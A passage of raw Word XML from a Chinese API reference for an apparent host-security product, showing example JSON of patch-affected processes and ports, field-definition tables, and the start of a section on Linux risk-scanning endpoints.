        <w:t>patchId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "QT012014001323",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 15816,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>processName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>startArgs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "-bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "pkg": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "Ver": "3.2",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "Name": "bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "Release": "147.17.30"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "ports": []</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "e9ee72243b0d879c",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>patchId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "QT012014001323",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1392,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>processName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>qpidd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>startArgs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>qpidd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --data-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /var/lib/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>qpidd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --daemon",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "pkg": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "Ver": "2.12-1.47.el6",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "Name": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>qpidd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "Release": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "ports": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bindIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "0.0.0.0",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "port": 5672,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "proto": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471AD7FC"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519"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="6122"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="0325E14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BDCB40A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CF3C724" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F2B6BF1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FD901C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="575153B0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F3FF3D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3379C4BD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="617D6465" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22815973" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="092FB7FC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="660468A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>patchId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="522F5663" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D11E2A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32307CC7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>补丁id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="22179E69" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06B20249" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="760E65C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2163C3DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B5DA1DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="36F0E53B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F24F709" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>processName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48260CC1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76C424F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DCA5A23" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="77C0CD28" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5296CD38" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>startArgs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E4BAD70" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3849A88F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>2048)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CD44DFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>启动参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4FF0EE35" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A8B6740" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>pkg</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1104D580" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="017F3B6A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0916EF8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>安装包详情：Ver-安装包版本；Name-安装包名；Release-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>安装包发性</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>版本号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="63F3E3EC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68EF4181" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DB0D6B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="442A170D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DC32F22" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>影响进程关联的端口号信息列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E7BB3E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Port返回信息说明：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="829"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="1874"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="7957157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AB125E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49078387" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="404DBADE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0106B4EA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5B815CCA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CDECF92" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bindIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ACDDD8C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36B8FE9B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="720C435E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口绑定的Ip信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5AA235BD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CD1A41A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61913071" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19FC4555" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DFC7F07" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="79FA2CB6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BF479CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>proto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CF103F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1531DC72" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34E2C05B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>协议：</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>udp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>等</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D92312A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="185" w:name="_Toc115166167"/>
      <w:bookmarkStart w:id="186" w:name="linux应用风险系统风险对外访问性账号风险"/>
      <w:bookmarkEnd w:id="170"/>
      <w:bookmarkEnd w:id="184"/>
      <w:r>
        <w:t>Linux应用风险/系统风险/对外访问性/账号风险</w:t>
      </w:r>
      <w:bookmarkEnd w:id="185"/>
    </w:p>
    <w:p w14:paraId="3C74D33A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供所有的Linux应用风险，系统风险，对外访问性，账号风险的检测和查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D83009" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="187" w:name="_Toc115166168"/>
      <w:bookmarkStart w:id="188" w:name="风险扫描-1"/>
      <w:r>
        <w:t>风险扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="187"/>
    </w:p>
    <w:p w14:paraId="48B7AC8D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于请求主机信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49636A8C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FB6816"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app|system|access|account</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D4C4B3"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BC669E" w14:paraId="319D139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58ABD0D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
